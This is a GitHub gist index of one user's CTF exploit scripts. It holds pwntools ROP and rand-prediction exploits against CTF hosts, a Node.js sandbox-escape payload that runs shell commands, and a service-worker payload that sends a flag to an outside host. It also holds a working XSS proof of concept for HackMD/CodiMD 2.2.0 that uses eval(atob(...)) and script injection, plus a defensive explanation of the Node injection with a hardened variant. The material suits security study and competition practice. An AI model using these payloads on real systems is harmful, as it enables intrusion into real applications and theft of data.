@po6ix
po6ix / spinit.py
Created June 8, 2021 14:51
securitnet2021-final
from pwn import *
from ctypes import *
from time import sleep
context.log_level = 'debug'
# load the target's libc through ctypes so rand() here yields the same sequence as on the target
rlibc = CDLL('./libc.so')
# seed it with the current time
rlibc.srand(rlibc.time(0))
# p = process('./chall')
@po6ix
po6ix / keybase.md
Created June 8, 2021 09:15
Keybase

Keybase proof

I hereby claim:

  • I am posix-lee on github.
  • I am posix (https://keybase.io/posix) on keybase.
  • I have a public key whose fingerprint is 8A8E 554E 754D BD83 79F8 9A4A 6DE9 FFC9 30A8 4F20

To claim this, I am signing this object:

@po6ix
po6ix / BabyArmROP.py
Last active June 6, 2021 11:07
2021 Zh3r0 CTF
from pwn import *
context.log_level = 'debug'
# p = process('./qemu-aarch64 -L . -g 1234 ./vuln'.split(' '))
p = remote('pwn.zh3r0.cf', 1111)
e = ELF('./vuln')
p.send('a'*8)
p.recvuntil('a'*8)
@po6ix
po6ix / MoM5m4g1c.py
Last active June 5, 2021 23:57
WTFCTF 2021
from pwn import *
p = remote('20.42.99.115', 3000)
payload = b'\1'*150
p.sendline(payload)
p.interactive()
@po6ix
po6ix / COP.py
Last active June 2, 2021 15:33
2021 ICHSA CTF
from pwn import *
# p = process('./game')
p = remote('cop.ichsa.ctf.today', 8011)
# pick menu option 2 0x90 times
for i in range(0x90):
    p.sendlineafter('Please chose an option', '2')
p.sendlineafter('Please chose an option', '2')
# 6 bytes of padding followed by the same gadget address 16 times
payload = b'aaaaaa' + p64(0x401813)*16
@po6ix
po6ix / hackmd.txt
Last active December 20, 2020 16:29
HackMD/CodiMD 2.2.0 XSS PoC
<a id=context><iframe id=context name=apiPublicKey href="x"></iframe><iframe id=context name=auth href="x" b=y></iframe><iframe id=context name=disqusUrl href="x"></iframe></a>
<div id="account-nav"></div><div id="anon-account-nav-tmpl">${eval(atob(`YWxlcnQob3JpZ2luKQ`))}</div>
* repeat below if you want to improve the reliability
```mermaid
graph LR;
A-->B;
click B callback "<script src=https://a.disquscdn.com/1608164631/build/js/abadd50d331d.js></script><script src=https://a.disquscdn.com/1608164631/js/src/global.js></script>"
```
@po6ix
po6ix / ex.html
Created December 13, 2020 16:20
Amazing notes
<iframe srcdoc="&#x3C;form action=&#x22;https://amazingnotes.asisctf.com:444/&#x22; method=&#x22;POST&#x22; id=x&#x3E;
&#x3C;input name=ext value=es&#x3E;
&#x3C;textarea name=note&#x3E;
self.addEventListener(&#x22;fetch&#x22;, function(event) {
if(event.request.url.indexOf(&#x22;flag&#x22;) != -1)
return;
event.respondWith(new Response(&#x60;
&#x3C;img src=//p6.is/givemeflag&#x3E;
<script>
@po6ix
po6ix / csregex.md
Created November 1, 2020 19:30
CyberSecurityRumble-Solutions
'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+' 
CSR{r363x_15_fun_r363x_15_l0v3}
function WeakMap(...e) {
    return {
        set: (...e) => {
            console.log(e)
        },
        has: () => {
            console.log(87)
            return 1;
        }
    }
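The `'+constructor.constructor("return process")()…+'` payload above only works when user input is spliced into a single-quoted JavaScript string that is then compiled and run. The following is an added example, not code from the gist or from the CTF: it reconstructs that class of sink as a hypothetical `compileUnsafe` function, shows the same breakout reaching the Node `process` object (reading `process.pid` instead of running `cat * | grep CSR`), and puts the hardened version beside it. The function names, the sink shape and the inputs are assumptions; the challenge's real code is not on the page.

```javascript
// Added example, not from the gist: `compileUnsafe`, `compileSafe` and the
// inputs are hypothetical reconstructions of the sink the payload breaks out of.

// Vulnerable sink: the user-supplied pattern is pasted inside a single-quoted
// JavaScript string literal and the resulting source text is compiled and run.
function compileUnsafe(pattern) {
  // new Function() has the same power as eval(): anything after a closing
  // quote is executed as code in the global scope of this process.
  return new Function("return new RegExp('" + pattern + "');")();
}

// Hardened sink: the pattern is handed to the RegExp constructor as data.
// No source text is generated, so quotes and + signs are just characters.
function compileSafe(pattern) {
  return new RegExp(pattern);
}

// Same breakout shape as the payload on the page. A bare `constructor`
// resolves through the global object to Object, Object.constructor is the
// Function constructor, and a function built that way runs outside the
// string context, so it can return the host's `process` object.
const PAYLOAD = "'+constructor.constructor(\"return process\")().pid+'";

function demoUnsafe() {
  const re = compileUnsafe(PAYLOAD);
  // The injected expression was evaluated: the compiled regex is now just
  // the digits of this process's pid, which proves code ran outside the string.
  return { leaked: re.source, pid: String(process.pid) };
}

function demoSafe() {
  const re = compileSafe(PAYLOAD);
  // Nothing was evaluated: the payload text is the pattern itself.
  return { source: re.source, ranCode: re.source !== PAYLOAD };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demoUnsafe());
  console.log(demoSafe());
}
```

The safe variant does not try to escape or filter the input; it simply never turns it into code. If the pattern is a malformed regex, `new RegExp` throws a `SyntaxError`, which the caller should catch and report rather than fall back to string building.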
@po6ix
po6ix / graphviz++
Last active September 6, 2020 13:23
2020 InterKosenCTF Writeups
digraph g1 {
subgraph cluster_0 {
style=filled;
color=lightgrey;
node [style=filled, color=white];
a0 -> a1 -> a2 -> a3;
}
start -> a0;
a3 -> end;
a1 -> b3;